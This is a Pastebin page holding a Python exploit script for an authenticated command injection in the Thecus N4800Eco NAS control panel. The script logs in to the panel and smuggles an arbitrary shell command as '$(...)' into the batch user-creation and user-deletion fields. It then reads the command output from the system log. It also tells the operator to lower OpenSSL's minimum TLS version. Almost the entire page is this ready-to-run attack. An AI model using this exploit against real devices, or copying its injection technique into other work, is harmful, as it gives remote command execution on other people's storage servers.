Advertisement
FlyFar

Thecus N4800Eco Nas Server Control Panel - Comand Injection

Feb 13th, 2024
747
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.25 KB | Cybersecurity | 0 0
  1. # Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
  2. # Date: 01/06/2021
  3. # Exploit Author: Metin Yunus Kandemir
  4. # Vendor Homepage: http://www.thecus.com/
  5. # Software Link: http://www.thecus.com/product.php?PROD_ID=83
  6. # Version: N4800Eco
  7. # Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
  8.  
  9.  
  10. #!/usr/bin/python3
  11. import requests
  12. import sys
  13. import urllib3
  14.  
  15.  
  16. # To fix SSL error that occurs when the script is started.
  17. # 1- Open /etc/ssl/openssl.cnf file
  18. # At the bottom of the file:
  19. # [system_default_sect]
  20. # MinProtocol = TLSv1.2
  21. # CipherString = DEFAULT@SECLEVEL=2
  22. # 2- Set value of MinProtocol as TLSv1.0
  23.  
  24.  
  25. def readResult(s, target):
  26.     d = {
  27.         "fun": "setlog",
  28.         "action": "query",
  29.         "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
  30.     }
  31.     url = "http://" + target + "/adm/setmain.php"
  32.     resultReq = s.post(url, data=d, verify=False)
  33.     dict = resultReq.text.split()
  34.     print("[+] Reading system log...\n")
  35.     print(dict[5:8])     #change this range to read whole output of the command
  36.  
  37. def delUser(s, target, command):
  38.     d = {
  39.         "action": "delete",
  40.         "username": "$("+command+")"
  41.     }
  42.     url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
  43.     delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
  44.  
  45.     if 'Local User remove succeeds' in delUserReq.text:
  46.         print('[+] %s command was executed successfully' % command)
  47.     else:
  48.         print('[-] %s command was not executed!' %command)
  49.         sys.exit(1)
  50.     readResult(s, target)
  51.  
  52. def addUser(s, target, command):
  53.     d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
  54.     url = "http://" + target + "/adm/setmain.php?fun=setbatch"
  55.     addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
  56.  
  57.     if 'Users and groups were created successfully.' in addUserReq.text:
  58.         print('[+] Users and groups were created successfully')
  59.     else:
  60.         print('[-] Users and groups were not created')
  61.         sys.exit(1)
  62.     delUser(s, target, command)
  63.  
  64. def login(target, username, password, command=None):
  65.     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  66.     s = requests.Session()
  67.     d = {
  68.         "&eplang": "english",
  69.         "p_pass": password,
  70.         "p_user": username,
  71.         "username": username,
  72.         "pwd": password,
  73.         "action": "login",
  74.         "option": "com_extplorer"
  75.     }
  76.     url = "http://" + target + "/adm/login.php"
  77.     loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
  78.  
  79.     if '"success":true' in loginReq.text:
  80.         print('[+] Authentication successful')
  81.     elif '"success":false' in loginReq.text:
  82.         print('[-] Authentication failed!')
  83.         sys.exit(1)
  84.     else:
  85.         print('[-] Something went wrong!')
  86.         sys.exit(1)
  87.     addUser(s, target, command)
  88.  
  89. def main(args):
  90.     if len(args) != 5:
  91.         print("usage: %s targetIp:port username password command" % (args[0]))
  92.         print("Example 192.168.1.13:80 admin admin id")
  93.         sys.exit(1)
  94.     login(target=args[1], username=args[2], password=args[3], command=args[4])
  95.  
  96.  
  97. if __name__ == "__main__":
  98.     main(args=sys.argv)
  99.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement